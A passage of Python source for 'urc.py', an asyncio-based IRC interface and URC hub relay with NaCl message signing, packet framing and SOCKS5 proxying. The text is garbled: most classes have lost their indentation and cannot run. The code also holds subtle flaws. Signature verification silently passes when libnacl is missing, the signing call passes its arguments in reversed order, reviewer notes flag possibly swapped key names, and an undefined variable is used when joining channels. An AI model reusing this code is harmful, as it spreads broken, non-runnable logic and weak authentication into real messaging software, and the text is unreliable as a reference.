_RE_USER_CMD = '^USER (%s) [%s\\*]+ [%s\\*]+\s:?%s' % ( _RE_NICK, _RE_CHARS, _RE_CHARS, _RE_NICK )
_RE_PRIVMSG_CMD = '^PRIVMSG (%s|%s) :?(.+)$' % (_RE_NICK, _RE_CHAN)
_RE_JOIN_CMD = '^JOIN (%s)' % _RE_CHAN
_RE_JOIN_MULTI_CMD = '^JOIN :?(.+)'
_RE_PART_CMD = '^PART (%s) :?(.+)$' % _RE_CHAN
_RE_PART_SIMPLE_CMD = '^PART (%s)$' % _RE_CHAN
_RE_TOPIC_CMD = '^TOPIC (%s) :?(.+)$' % _RE_CHAN
_RE_QUIT_CMD = '^QUIT (.+)$'
_RE_LIST_CMD = '^(LIST)'
_RE_PING_CMD = '^PING (.*)$'
_RE_PONG_CMD = '^PONG (.*)$'
_RE_MODE_CMD = '^MODE (%s)?\\s(\\w+)$' % _RE_CHAN
_RE_WHO_CMD = '^WHO (%s)$' % _RE_CHAN
_RE_AWAY_ON_CMD = '^AWAY (.+)$'
_RE_AWAY_OFF_CMD = '^(AWAY) ?$'
# -- end lameass regexp block
# -- begin crypto stuff
# detached signature size in bytes; 0 when libnacl is unavailable
_SIG_SIZE = libnacl and libnacl.crypto_sign_BYTES or 0
def nacl_keygen(seed=None):
    """
    generate nacl signing keypair, deriving it from *seed* when given,
    otherwise from fresh random bytes; returns (sk, vk, seed)

    NOTE(review): libnacl.crypto_sign_seed_keypair returns (vk, sk); the
    unpacking below looks swapped — confirm which element is the secret key
    before relying on the names.
    """
    if not seed:
        seed = libnacl.randombytes(libnacl.crypto_sign_SEEDBYTES)
    sk, vk = libnacl.crypto_sign_seed_keypair(seed)
    return sk, vk, seed
def nacl_verify(m, s, pk):
    """
    verify message m with detached signature s for public key pk;
    raises on a bad signature.  NOTE: silently verifies NOTHING when
    libnacl is unavailable.
    """
    if libnacl:
        libnacl.crypto_sign_open(s+m, pk)
def nacl_sign(m, sk):
    """
    sign message m with secret key sk and return the detached signature
    (the first _SIG_SIZE bytes of the signed message).
    Returns None when libnacl is unavailable.
    """
    if libnacl:
        s = libnacl.crypto_sign(m,sk)[:_SIG_SIZE]
        assert len(s) == _SIG_SIZE
        return s
def pubkey2bin(pk):
    """Decode an ascii-hex public key into raw bytes."""
    return binascii.a2b_hex(pk)
def bin2pubkey(bin):
    """Encode a raw public key as an ascii-hex string."""
    return binascii.b2a_hex(bin).decode('ascii')
# -- end crypto stuff
# -- begin irc functions
def irc_is_chan(chan):
    """
    return True if *chan* names a channel, i.e. starts with one of the
    channel sigils in _CHAN_PREFIX
    """
    # same semantics as the original loop, including IndexError on ''
    return chan[0] in _CHAN_PREFIX
def _irc_re_parse(regex, line, upper=True):
if upper:
line = line.upper()
m = re.match(regex, line)
if m:
return m.groups()
# thin per-command parsers: each returns the regex capture groups for its
# command, or None when the line is not that command (PING/PONG keep case)
irc_parse_away_on = lambda line : _irc_re_parse(_RE_AWAY_ON_CMD, line)
irc_parse_away_off = lambda line : _irc_re_parse(_RE_AWAY_OFF_CMD, line)
irc_parse_nick_user_serv = lambda line : _irc_re_parse(_RE_SRC_CMD, line)
irc_parse_channel_name = lambda line : _irc_re_parse(_RE_CHAN, line)
irc_parse_nick = lambda line : _irc_re_parse(_RE_NICK_CMD, line)
irc_parse_user = lambda line : _irc_re_parse(_RE_USER_CMD, line)
irc_parse_privmsg = lambda line : _irc_re_parse(_RE_PRIVMSG_CMD, line)
irc_parse_join = lambda line : _irc_re_parse(_RE_JOIN_CMD, line)
irc_parse_multi_join = lambda line : _irc_re_parse(_RE_JOIN_MULTI_CMD, line)
irc_parse_part = lambda line : _irc_re_parse(_RE_PART_CMD, line)
irc_parse_part_simple = lambda line : _irc_re_parse(_RE_PART_SIMPLE_CMD, line)
irc_parse_quit = lambda line : _irc_re_parse(_RE_QUIT_CMD, line)
irc_parse_ping = lambda line : _irc_re_parse(_RE_PING_CMD, line, False)
irc_parse_pong = lambda line : _irc_re_parse(_RE_PONG_CMD, line, False)
irc_parse_list = lambda line : _irc_re_parse(_RE_LIST_CMD, line)
irc_parse_mode = lambda line : _irc_re_parse(_RE_MODE_CMD, line)
irc_parse_who = lambda line : _irc_re_parse(_RE_WHO_CMD, line)
irc_parse_topic = lambda line : _irc_re_parse(_RE_TOPIC_CMD, line)
def irc_greet(serv, nick, user, motd):
    """
    generate an irc greeting (welcome numerics + MOTD) for a new user;
    yields protocol lines to send
    """
    numerics = (
        ('001', ':{}'.format(serv)),
        ('002', ':{}!{}@{}'.format(nick, user, serv)),
        ('003', ':{}'.format(serv)),
        ('004', '{} 0.0 :+'.format(serv)),
        ('005', 'NETWORK=urc.{} CHANTYPES=#&!+ CASEMAPPING=ascii '.format(serv) +
         'CHANLIMIT=25 NICKLEN=25 TOPICLEN=128 CHANNELLEN=16 COLOUR=1 UNICODE=1 PRESENCE=0:'),
    )
    for num, msg in numerics:
        yield ':{} {} {} {}\n'.format(serv, num, nick, msg)
    yield ':{} 254 {} 25 :CHANNEL(s)\n'.format(serv, nick)
    yield ':{}!{}@{} MODE {} +i\n'.format(nick, user, serv, nick)
    yield ':{} 376 {} :- {} MOTD -\n'.format(serv, nick, serv)
    for line in motd:
        yield ':{} 372 {} :- {}\n'.format(serv, nick, line)
    yield ':{} 376 {} :RPL_ENDOFMOTD\n'.format(serv, nick)
# -- end irc functions
def taia96n():
    """
    get an unnecessarily accurate (seconds, nanoseconds) timestamp for now
    """
    now = time.time()
    # TAI64-style constant offset on the seconds part
    seconds = 4611686018427387914 + int(now)
    # sub-second part, with a little random jitter added
    nanos = int(1000000000 * (now % 1) + randrange(0, 512))
    return seconds, nanos
def taia96n_now():
    """
    get an unnecessarily accurate packed 12-byte (!QI) timestamp for now
    """
    # fix: removed a dead `now = time.time()` whose result was never used
    # (taia96n reads the clock itself)
    sec, nano = taia96n()
    return struct.pack('!QI', sec, nano)
def taia96n_parse(data):
    """
    parse a packed 12-byte (!QI) timestamp into (sec, nano),
    or return None when *data* has the wrong length
    """
    if len(data) == 12:
        return struct.unpack('!QI', data)
    return None
def filter_urcline(string, filler=''):
    """
    replace CR and NUL — characters illegal in a urcline — with *filler*
    """
    return ''.join(filler if ch in '\r\x00' else ch for ch in string)
def parse_urcline(line):
    """
    return (source, command, destination, message) tuple from a URCLINE,
    or None when the syntax is invalid
    """
    match = re.match(_RE_URCLINE, line)
    return match.groups() if match else None
def mk_hubpkt(pktdata, pkttype=URC_PLAIN):
    """
    build a urc hub packet wrapping *pktdata*:
    2-byte length, 12-byte timestamp, 2-byte type, 2 reserved bytes,
    8 random bytes, then the payload
    """
    length = len(pktdata)
    if pkttype == URC_PY_SIGN:
        # signed packets carry a trailing signature counted in the length
        length += _SIG_SIZE
    parts = [
        struct.pack('!H', length),   # packet length
        taia96n_now(),               # timestamp
        struct.pack('!H', pkttype),  # packet type
        b'\x00\x00',                 # reserved
        rand(8),                     # 64 bit random
        pktdata,
    ]
    return b''.join(parts)
class _log:
    """
    minimal stand-in logger used when the stdlib logging module is not wanted
    """

    def __init__(self):
        # every severity routes to the same printer
        self.debug = self.info = self.warn = self.error = self._logit

    def _logit(self, *args):
        prnt ('<urc.py> '+''.join(args))
def inject_log(obj, native_log=True):
    """
    attach a logger to *obj* as obj.log — a stdlib logger named after the
    object's class when native_log is True, otherwise the local _log shim
    """
    if native_log:
        obj.log = logging.getLogger(obj.__class__.__name__)
    else:
        obj.log = _log()
class _bloom_filter:
"""
http://code.activestate.com/recipes/577684-bloom-filter/
"""
def __init__(self, num_bytes, num_probes):
self.array = bytearray(num_bytes)
self.num_probes = num_probes
self.num_bins = num_bytes * 8
def get_probes(self, key):
h = int(sha256(key).hexdigest(), 16)
for _ in range(self.num_probes):
yield h & 262143 # 2 ** 18 - 1
h >>= 18
def add(self,key):
for i in self.get_probes(key):
self.array[i//8] |= 2 ** (i%8)
def __contains__(self, key):
return all(self.array[i//8] & (2 ** (i%8)) for i in self.get_probes(key))
class urc_hub_connection:
    """One hub-to-hub link over an asyncio StreamReader/StreamWriter pair."""

    def __init__(self, urcd, r, w):
        # urcd: owning URCD daemon; r/w: asyncio stream reader/writer
        self.urcd = urcd
        self.r, self.w = r, w
        inject_log(self)

    @asyncio.coroutine
    def get_hub_packet(self):
        """
        yield a hub packet tuple , (raw_packet, packet_data, packet_type)
        returns None when the header read failed (connection torn down)
        """
        pkt = yield from self._read_hdr()
        if pkt:
            hdr, pktlen, tsec, tnano, pkttype = pkt
            data = yield from self._read_data(pktlen)
            return hdr + data , data, pkttype, (tsec, tnano)

    @asyncio.coroutine
    def _read_hdr(self):
        # 26-byte header: 2 len + 12 timestamp + 2 type + 2 reserved + 8 random
        try:
            raw = yield from self.r.readexactly(26)
        except:
            # NOTE(review): bare except — also swallows cancellation;
            # on any failure the link is closed and None is returned
            self.close()
            self.urcd.disconnected(self)
        else:
            pktlen = struct.unpack('!H', raw[:2])[0]
            self.log.debug('read packet len={}'.format(pktlen))
            tsec, tnano = taia96n_parse(raw[2:14])
            self.log.debug('packet time {}'.format(tsec))
            pkttype = struct.unpack('!H', raw[14:16])[0]
            self.log.debug('pkttype={}'.format(pkttype))
            return raw, pktlen, tsec, tnano, pkttype

    @asyncio.coroutine
    def _read_data(self, pktlen):
        # payload length comes from the header; readexactly raises on EOF
        data = yield from self.r.readexactly(pktlen)
        self.log.debug('data={}'.format([data]))
        return data

    def close(self):
        self.w.transport.close()

    def send_hub_packet(self,pktdata):
        """
        send a hub packet
        pktdata must be bytes and a valid packet

        NOTE(review): this is a generator (it uses ``yield from``) but is not
        decorated with @asyncio.coroutine; callers schedule it via
        asyncio.async, which accepts bare generators on old asyncio.
        """
        self.log.info('send packet')
        self.log.info('write %d bytes' % len(pktdata))
        self.log.info('write %s' % [pktdata])
        self.w.write(pktdata)
        try:
            data = yield from self.w.drain()
            self.log.info('drained')
        except Exception as e:
            self.log.error(e)
            self.urcd.disconnected(self)
        except asyncio.streams.IncompleteReadError:
            # NOTE(review): unreachable — the broader `except Exception`
            # above already catches IncompleteReadError
            self.log.error('incomplete')
            self.w.transport.close()
            self.urcd.disconnected(self)
class irc_handler:
"""
simple ircd ui logic
"""
def __init__(self, daemon, r, w):
self.daemon = daemon
self.loop = daemon.loop
self.r, self.w = r, w
self.nick = None
self.user = None
self.ponged = False
self._pong = str(randint(100,1000))
self.greeted = False
self.chans = list()
self._last_ping = time.time()
self._pings = dict()
inject_log(self)
self._id = daemon.randnick()
asyncio.async(self.send_line('PING :{}\n'.format(self._pong)))
asyncio.async(self._get_line())
def disconnect(self):
"""
disconnect this user
"""
self.log.info('disconnect user')
self.w.close()
self.w = None
self.r = None
def ping(self):
"""
ping this user
"""
ping = int(time.time())
self._pings[str(ping)] = ping
asyncio.async(self.send_line('PING :{}\n'.format(ping)))
@asyncio.coroutine
def _get_line(self):
if self.r is None:
return
line = yield from self.r.readline()
if len(line) != 0:
try:
yield from self._handle_line(line)
except Exception as e:
self.log.error(e)
self.daemon.disconnected(self)
raise e
else:
asyncio.async(self._get_line())
def change_nick(self, new_nick):
if self.daemon.anon or self.daemon.has_nick(new_nick):
line = ':{} 433 {} :{}\n'.format(self.daemon.name, self.nick, new_nick)
asyncio.async(self.send_line(line))
else:
line = ':{}!{}@{} NICK {}\n'.format(self.nick,self.user, self.daemon.name, new_nick)
asyncio.async(self.send_line(line))
self.nick = new_nick
self.daemon.inform_chans_for_user(self, line)
@asyncio.coroutine
def send_line(self, line, upper=True):
"""
send a single line
"""
if self.w is None:
return
if upper:
line = line.upper()
self.w.write(line.encode('utf-8'))
self.log.debug(' <-- {}'.format(line))
try:
return self.w.drain()
except:
self.daemon.disconnected(self)
@asyncio.coroutine
def send_lines(self, lines):
"""
send a single line
"""
_lines = list()
for line in lines:
line = line.upper()
_lines.append(line.encode('utf-8'))
self.log.debug(' <-- {}'.format(line))
self.w.writelines(_lines)
try:
return self.w.drain()
except:
self.daemon.disconnected(self)
def _got_pong(self, pong):
if pong[0] == ':':
pong = pong[1:]
if pong == self._pong:
self.ponged = True
def _ack_ping(self, ping):
"""
ack a ping that may or may not have been sent
"""
if ping in self._pings:
self._pings.pop(ping)
self._last_ping = time.time()
def is_timed_out(self):
"""
has this connection timed out?
"""
return ( time.time() - self._last_ping ) > self.daemon.ping_timeout
@asyncio.coroutine
def _handle_line(self, line):
"""
handle a line from irc client
"""
line = line.decode('utf-8')
line = filter_urcline(line)
line = line.replace("\r\n", "\n")
self.log.debug(' --> %s' %[line])
_nick = irc_parse_nick(line)
_user = irc_parse_user(line)
_join = irc_parse_join(line)
_joins = irc_parse_multi_join(line)
_list = irc_parse_list(line)
_part = irc_parse_part(line)
_part_simple = irc_parse_part_simple(line)
_quit = irc_parse_quit(line)
_privmsg = irc_parse_privmsg(line)
_ping = irc_parse_ping(line)
_pong = irc_parse_pong(line)
_mode = irc_parse_mode(line)
_who = irc_parse_who(line)
_away_on = irc_parse_away_on(line)
_away_off = irc_parse_away_off(line)
_topic = irc_parse_topic(line)
if _away_on:
asyncio.async(self.send_line(':{} 306 {} :RPL_UNAWAY\n'.format(self.daemon.name, self.nick)))
if _away_off:
asyncio.async(self.send_line(':{} 305 {} :RPL_AWAY\n'.format(self.daemon.name, self.nick)))
if _pong:
self._got_pong(_pong[0])
# WHO
if _who:
lines = list()
lines.append(':{} 352 {} {} {} {} {} {} H :0 {}\n'.format(self.daemon.name, self.nick,
_who[0], self.nick,
self.daemon.name, self.nick,
self.nick, self.nick))
lines.append((':{} 315 {} {} :RPL_ENDOFWHO\n'.format(self.daemon.name, self.nick, _who[0])))
asyncio.async(self.send_lines(lines))
# MODE
if _mode:
asyncio.async(self.send_line(':{} 324 {} {} +n\n'.format(self.daemon.name, self.nick, _mode[0])))
# LIST
if _list:
self.log.info('list')
lines = list()
lines.append(':{} 321 {} CHANNELS :USERS TOPIC\n'.format(self.daemon.name, self.nick))
for c in self.daemon.irc_chans:
chan = self.daemon.irc_chans[c]
if irc_is_chan(c) and len(chan) > 0:
lines.append(':{} 322 {} {} {} :{}\n'.format(self.daemon.name, self.nick, c, 9000 + randint(10, 100), "URC RELAY CHAT"))
lines.append(':{} 323 {} :RPL_LISTEND\n'.format(self.daemon.name, self.nick))
asyncio.async(self.send_lines(lines))
# PING
if _ping:
if _ping[0][0] != ':':
_ping = ':{}'.format( _ping[0] )
else:
_ping = _ping[0]
asyncio.async(self.send_line(':{} PONG {}\n'.format(self.daemon.name, _ping), False))
# PONG
if _pong:
if _pong[0][0] == ':':
self._ack_ping(_pong[0][1:])
else:
self._ack_ping(_pong[0])
# QUIT
if _quit:
self.w.write_eof()
self.w.transport.close()
self.daemon.disconnected(self)
# NICK
if self.nick is None and _nick is not None:
if self.daemon.anon:
self.nick = self.daemon.randnick()
else:
_nick = self.daemon.filter_nick(_nick[0])
self.nick = _nick
elif self.nick is not None and _nick is not None:
_nick = self.daemon.filter_nick(_nick[0])
self.change_nick(_nick)
# USER
if self.user is None and _user is not None:
if self.daemon.anon:
self.user = self.daemon.randnick()
else:
self.user = _user[0]
if self.greeted and self.ponged:
# JOIN
self.log.debug(_joins)
chans = list()
if _joins:
for chan in _joins[0].split(','):
self.log.debug(chan)
if irc_is_chan(chan):
chans.append(chan)
self.log.debug('multijoin {}'.format(chan))
elif _join and _join[0] not in self.chans:
chans.append(_join[0])
for chan in chans:
chan = chan.strip()
self.log.debug('join {}'.format(chan))
if chan in self.chans:
self.log.debug('not joining {}'.format(chan))
continue
self.chans.append(chan)
self.daemon.joined(self, chan)
self.daemon.activity(self.nick, chan)
lines = list()
n = self.daemon.anon and 'anon' or conn.nick
lines.append(':{} 353 {} = {} :{}\n'.format(self.daemon.name, n, chan, n))
lines.append(':{} 366 {} {} :RPL_ENDOFNAMES\n'.format(self.daemon.name, self.nick, chan))
asyncio.async(self.send_lines(lines))
if _topic and _topic[1] in self.chans:
self.daemon.inform_chans_for_user(self, ":{}!{}@{} TOPIC {} :{}\n".format(self.nick, self.user, self.daemon.name, chan, _topic[2]))
# PART
if _part or _part_simple:
if _part_simple:
chan = _part_simple[0]
else:
chan = _part[0]
if chan in self.chans:
self.chans.remove(chan)
nick = self.nick
line = ':{}!anon@{} PART {}\n'.format(nick, self.daemon.name, chan)
asyncio.async(self.send_line(line))
# PRVIMSG
if _privmsg:
dest, msg = _privmsg
nick = self.daemon.anon and 'anon' or self.nick
self.daemon.activity(nick, dest)
line = ':{}!anon@{} PRIVMSG {} :{}\n'.format(nick,
self.daemon.name, dest, msg)
if irc_is_chan(dest):
self.daemon.inform_chans_for_user(self, line)
else:
if dest == '*urcd' and False: # todo: implement
self.daemon.handle_control(self, msg)
else:
for con in self.daemon.irc_cons:
if con.nick == dest:
asyncio.async(con.send_line(line))
# don't stop propagation
self.daemon.broadcast(line)
else:
if self.nick is not None and self.user is not None:
self.greeted = True
asyncio.async(self.send_lines(irc_greet(self.daemon.name, self.nick, self.user, self.daemon.motd())))
class IRCD:
"""
simple ircd UI
"""
def __init__(self, urcd, controller, check_auth, do_auth):
self.name = 'irc.%s.tld' % urcd.name
self.anon = True
self.irc_cons = list()
self.irc_chans = dict()
self.urcd = urcd
self.controller_hook = controller
self.do_auth_hook = do_auth
self.check_auth_hook = check_auth
self.loop = asyncio.get_event_loop()
self.ping_interval = 60
self.ping_tries = 3
self.ping_timeout = self.ping_interval * self.ping_tries
inject_log(self)
self.loop.call_later(1, self.send_pings)
self.loop.call_later(1, self.check_ping_timeout)
def send_pings(self):
"""
send pings
"""
for con in self.irc_cons:
con.ping()
self.loop.call_later(self.ping_interval, self.send_pings)
def check_ping_timeout(self):
"""
check for ping timeouts
remove as needed
"""
for con in self.irc_cons:
if con.is_timed_out():
con.disconnect()
self.disconnected(con)
self.loop.call_later(5, self.check_ping_timeout)
def filter_nick(self, nick):
"""
do nickname rewrite rules
"""
if nick == 'nameless':
nick = self.randnick()
while self.has_nick(nick):
nick = self.randnick()
return nick
def randnick(self, nicklen=7, vowels='aeiou', letters='cvbnmlkhgfdswrtp', numbers='1234567890'):
"""
generate random nickname
"""
ret = str()
for n in range(nicklen):
chars = letters
if n % 2 != 0:
chars = vowels
ret += random.choice(chars).lower()
return ret
def handle_control(self, con, msg):
"""
handle admin actions
"""
if self.check_auth_hook(con):
asyncio.async(self.controller_hook(con, msg))
else:
asyncio.async(self.do_auth_hook(con, msg))
def joined(self, con, chan):
"""
a user has joined a channel
"""
asyncio.async(con.send_line(':{}!anon@{} JOIN :{}\n'.format(con.nick, self.name, chan)))
n = self.anon and 'anon' or con.nick
line = ':{}!anon@{} JOIN :{}\n'.format(n, self.name, chan)
for user in self.irc_cons:
if user.nick == con.nick:
continue
if chan in user.chans:
asyncio.async(user.send_line(line))
asyncio.async(con.send_line(":{} NOTICE {} :THIS CHANNEL MAY LOOK EMPTY BUT IT IS NOT :-DDDD\n".format(self.name, chan)))
def has_nick(self, nick):
"""
return True if this ircd has a user with nickname nick connected
"""
for user in self.irc_cons:
if user.nick == nick:
return True
return False
def motd(self, fname='motd.txt'):
"""
read motd file
"""
yield 'our public key is {}'.format(self.urcd.pubkey())
if os.path.exists(fname):
with open(fname) as f:
for line in f.read().split('\n'):
yield line
else:
yield 'Channels are empty at first'
def incoming_connection(self, r, w):
"""
handle incoming connections
"""
con = irc_handler(self, r, w)
self.irc_cons.append(con)
def inform_chans_for_user(self, user, line):
"""
send a line to every user that is in every channel this user is in
"""
self.log.debug('inform chans for {} : {}'.format(user.nick, [line]))
for con in self.irc_cons:
if con == user:
continue
for chan in con.chans:
if chan in user.chans:
asyncio.async(con.send_line(line))
break
def user_quit(self, con):
"""
tell appropriate users that a user quit
"""
# find all users in every chan they are in
# give them a quit message from this user
users = list()
for chan in con.chans:
# remove connection from channel
_chan = self.irc_chans[chan]
if con.nick in _chan:
_chan.pop(con.nick)
def disconnected(self, con):
"""
handle connection lost
"""
self.log.info('disconnecting {}'.format(con))
self.irc_cons.remove(con)
self.user_quit(con)
def activity(self, nick, chan):
"""
called when we got activity by user with nick in channel chan
"""
tstamp = taia96n_now()
if chan not in self.irc_chans:
self.irc_chans[chan] = dict()
self.irc_chans[chan][nick] = tstamp
def urc_activity(self, src, cmd, dst, msg):
"""
update the state of the ircd from a remote line
"""
src = self.anon and 'anon!anon@{}'.format(self.name) or src
if msg is None:
line = ':{} {} {}\n'.format(src, cmd, dst)
elif dst is None:
line = ':{} {} :{}\n'.format(src, cmd, msg)
else:
line = ':{} {} {} :{}\n'.format(src, cmd, dst, msg)
self.log.debug((src, cmd, dst, msg))
cmd = cmd.upper()
if dst is None:
_chan = irc_is_chan(msg) and msg or None
else:
_chan = irc_is_chan(dst) and dst or None
_nick = None
if _chan is None:
_nick = dst
self.log.debug((_chan, _nick, msg))
nick, user, serv = irc_parse_nick_user_serv(src) or None, None, None
if _chan and nick:
# for LIST
if _chan not in self.irc_chans:
self.irc_chans[_chan] = dict()
# JOIN
if cmd == 'JOIN' and nick not in self.irc_chans[_chan]:
self.activity(nick, _chan)
# PRIVMSG
if cmd == 'PRIVMSG' and nick:
self.activity(nick, _chan)
_chan = _chan.upper()
nick = self.anon and 'anon' or nick
if _nick:
for user in self.irc_cons:
if user.nick == _nick:
asyncio.async(user.send_line(line))
return
if _chan:
for irc in self.irc_cons:
self.log.debug(irc.chans)
if _chan in irc.chans:
asyncio.async(irc.send_line(line))
def broadcast(self, line):
"""
broadcast a line to the network
"""
self.urcd.broadcast(line)
class AdminUI:
    """
    urc.py irc admin interface — currently a stub: every handler is a no-op
    """

    def __init__(self, urcd):
        self.urcd = urcd

    @asyncio.coroutine
    def handle_admin(self, con, msg):
        """
        handle an admin action (not implemented yet)
        """

    def check_auth(self, con):
        """
        check if a connection is authenticated with the admin ui
        (always returns None, i.e. unauthenticated, until implemented)
        """

    @asyncio.coroutine
    def handle_auth(self, con, msg):
        """
        handle login attempt from connection (not implemented yet)
        """
class URCD:
"""
urcd server context
"""
def __init__(self, sign=True, name='urc.py', irc=True, loop=None):
inject_log(self)
self.sign = sign
if sign:
self.loadkey()
self.log.info('our pubkey is {}'.format(self.pubkey()))
else:
self.pk = None
self.sk = None
self.name = name
if irc:
self.admin = AdminUI(self)
self.ircd = IRCD(self, self.admin.handle_admin, self.admin.check_auth, self.admin.handle_auth)
else:
self.admin = None
self.ircd = None
if loop is not None:
self.loop = loop
else:
self.loop = asyncio.get_event_loop()
self.gui = None
self.hubs = list()
self.persist_hubs = dict()
self.hooks = list()
self._urc_cache = _bloom_filter(32 * 1024, 4)
def start(self):
self.loop.call_later(1, self._persist_hubs)
def loadkey(self, keyfile='privkey.dat'):
if os.path.exists(keyfile):
with open(keyfile, 'rb') as rf:
seed = rf.read()
self.sk, self.pk, seed = nacl_keygen(seed)
else:
self.sk, self.pk, seed = nacl_keygen()
with open(keyfile, 'wb') as wf:
wf.write(seed)
def _persist_hub(self, addr):
"""
persist hub connection, connect out
"""
parts = addr.split(' ')
host, port = parts[0], int(parts[1])
con = yield from self._connect_hub(host, port)
if con is None:
self.persist_hubs[addr] = None
return
self.persist_hubs[addr] = con
def pubkey(self):
"""
get ascii representation of our public key
"""
return self.pk and bin2pubkey(self.pk) or 'not made'
def _persist_hubs(self):
"""
call every second, keep hub connections persisted
"""
for addr in self.persist_hubs:
if self.persist_hubs[addr] is None:
asyncio.async(self._persist_hub(addr), loop=self.loop)
self.loop.call_later(1, self._persist_hubs)
@asyncio.coroutine
def forward_hub_packet(self, connection, pkt, min_delay=1, max_delay=3):
"""
forward URCLINE from connection
"""
sleeptime = random.randint(100, 1000)
self.log.info("sleep {}ms".format(sleeptime))
_ = yield from asyncio.sleep(float(sleeptime) / 1000.0, loop=self.loop)
for k in self.persist_hubs:
con = self.persist_hubs[k]
if con is not 0 and con is not None:
if con != connection:
asyncio.async(con.send_hub_packet(pkt), loop=self.loop)
for con in self.hubs:
if con != connection:
asyncio.async(con.send_hub_packet(pkt), loop=self.loop)
def broadcast(self, urcline):
"""
send urcline to all connection
"""
if isinstance(urcline, str):
urcline = urcline.encode('utf-8')
self.log.info('broadcast {}'.format(urcline))
msgtype = URC_PLAIN
sig = bytearray()
if self.sign:
msgtype = URC_PY_SIGN
sig = nacl_sign(self.sk, urcline)
pktdata = mk_hubpkt(urcline, msgtype) + sig
self._urc_cache.add(pktdata)
asyncio.async(self.forward_hub_packet(None, pktdata), loop=self.loop)
def _new_hub_connection(self, r, w):
"""
called when we got a new hub connection
"""
con = urc_hub_connection(self, r, w)
asyncio.async(self._get_hub_packet(con), loop=self.loop)
return con
def _socks_handshake(self, r, w, host, port):
"""
do socks v5 handshake
"""
w.write(b'\x05\x01\x00')
_ = yield from w.drain()
data = yield from r.readexactly(2)
self.log.debug('read handshake %r' % data)
req = struct.pack('!BBBBB', 5, 1, 0, 3, len(host))
req += host.encode('utf-8')
req += struct.pack('!H', port)
self.log.debug('write request %r' % req)
w.write(req)
_ = yield from w.drain()
self.log.debug('read response %d bytes' % len(req))
data = yield from r.readexactly(4)
if data[3] == 1:
_ = yield from r.readexactly(4)
else:
self.log.debug('wtf?')
w.close()
port = yield from r.readexactly(2)
self.log.debug(struct.unpack('!H', port))
return data[1] == 0
def _connect_hub(self, host, port):
"""
connect out to a hub
"""
hub = '{} {}'.format(host, port)
self.persist_hubs[hub] = 0
prnt('connecting to hub at {} port {}'.format(host, port))
if hasattr(self, 'use_socks') and self.use_socks:
r, w = yield from asyncio.open_connection(self.socks_host, int(self.socks_port), loop=self.loop)
result = yield from self._socks_handshake(r, w, host, int(port))
self.log.debug('socks = {}'.format(result))
else:
try:
r, w = yield from asyncio.open_connection(host, int(port), loop=self.loop)
except Exception as e:
prnt('error connecting to {} {} {}'.format(host, port, e))
return
else:
result = True
if result is True:
prnt('connected to hub at {} port {}'.format(host, port))
con = self._new_hub_connection(r, w)
con.addr = hub
return con
else:
prnt('connection to hub at {} port {} failed'.format(host, port))
w.close()
def disconnected(self, con):
"""
urc hub has disconnected
"""
prnt ('hub connection to {} lost'.format(con.addr))
self.log.info('hub disconnceted')
if con.addr in self.persist_hubs:
self.persist_hubs[con.addr] = None
if con in self.hubs:
self.hubs.remove(con)
def connect_hub(self, host, port):
"""
add urc hub to peristed hub connections
"""
self.log.info('connect to hub at {} port {}'.format(host, port))
self.persist_hubs['{} {}'.format(host,port)] = None
def disconnect(self):
self.loop.call_soon(self._disconnnect_all)
def _disconnnect_all(self):
hub_keys = list(self.persist_hubs.keys())
for key in hub_keys:
self._remove_hub(key)
def disconnect_hub(self, host, port):
self.loop.call_soon(self._remove_hub, "{} {}".format(host, port))
def _remove_hub(self, name):
if name in self.persist_hubs:
hub = self.persist_hubs[name]
if hub:
hub.close()
del self.persist_hubs[name]
prnt("disconnected from {}".format(name))
def _incoming_hub(self, r, w):
"""
incoming hub connection
"""
self.log.info('incoming hub connection')
con = self._new_hub_connection(r, w)
con.addr = None
self.hubs.append(con)
def bind_ircd(self, host, port):
"""
bind ircd to host:port
"""
if self.ircd:
asyncio.async(asyncio.start_server(self.ircd.incoming_connection, host, port), loop=self.loop)
self.log.info('bind ircd to {} port {}'.format(host,port))
def bind_hub(self, host, port):
"""
bind server to host:port
"""
asyncio.async(asyncio.start_server(self._incoming_hub, host, port), loop=self.loop)
self.log.info('bind hub to {} port {}'.format(host,port))
def get_pubkeys(self, fname='pubkeys.txt'):
"""
get list of public keys
"""
if os.path.exists(fname):
with open(fname) as f:
for line in f.read().split('\n'):
yield line.strip()
def _get_hub_packet(self, con):
"""
obtain a hub packet
"""
try:
self.log.debug('get packet')
pkt = yield from con.get_hub_packet()
if pkt:
raw, data, pkttype, tstamp = pkt
else:
return
except:
con.close()
self.disconnected(con)
raise
else:
asyncio.async(self._handle_hub_packet(con, raw, data, pkttype, tstamp), loop=self.loop)
def _bad_timestamp(self, tstamp, dlt=128):
"""
return true if timestamp is too old or too new
"""
nowsec, nownano = taia96n()
thensec, thennano = tstamp
if abs(nowsec - thensec) > dlt:
self.log.debug(nowsec - thensec)
return True
return False
def set_proxy(self, host, port):
"""
set socks proxy
"""
self.socks_host = host
self.socks_port = port
self.use_socks = True
def urc_activity(self, src, cmd, dst, msg):
"""
called when we got a message from urc
"""
if self.ircd:
self.ircd.urc_activity(src, cmd, dst, msg)
if self.gui:
if dst and dst[0] in ['#', '&', '+', '$']:
ctx = self.gui.find_context(channel=dst)
if ctx:
ev = "Channel Message"
if cmd != "PRIVMSG":
ctx.prnt(":{} {} {} :{}".format(src, cmd, dst, msg))
else:
src = src.split("!")[0]
ctx.emit_print(ev, "<<{}>>".format(src), msg, "")
@asyncio.coroutine
def _handle_hub_packet(self, con, raw, data, pkttype, tstamp):
"""
process hub packet
"""
self.log.debug('handle packet')
if self._bad_timestamp(tstamp):
self.log.info('bad timestamp')
elif raw not in self._urc_cache:
self._urc_cache.add(raw)
pubkey = None
if pkttype == URC_SIGN:
sig = raw[0-_SIG_SIZE:]
body = data
self.log.debug('urcsign sig={}, body={}'.format(sig, body))
if pkttype == URC_PY_SIGN:
sig = data[0-_SIG_SIZE:]
body = raw[:0-_SIG_SIZE]
self.log.debug('sig is %s' % [sig])
self.log.debug('body is %s' % [body])
for key in self.get_pubkeys():
self.log.debug('try key {}'.format(key))
try:
pkey = pubkey2bin(key)
nacl_verify(body, sig, pkey)
pubkey = key
self.log.debug('we are %s' % pubkey)
data = data[:0-_SIG_SIZE]
break
except Exception as e:
self.log.debug('not key {} because {}'.format(key, e))
continue
if pkttype == URC_PY_SIGN and pubkey is None:
data = data[:0-_SIG_SIZE]
try:
_data = data.decode('utf-8')
except UnicodeDecodeError:
pass
else:
parsed = parse_urcline(_data)
if parsed:
src, cmd, dst, msg = parsed
if pubkey == None and pkttype == URC_PY_SIGN:
src = 'fakeuser!lamer@spoof'
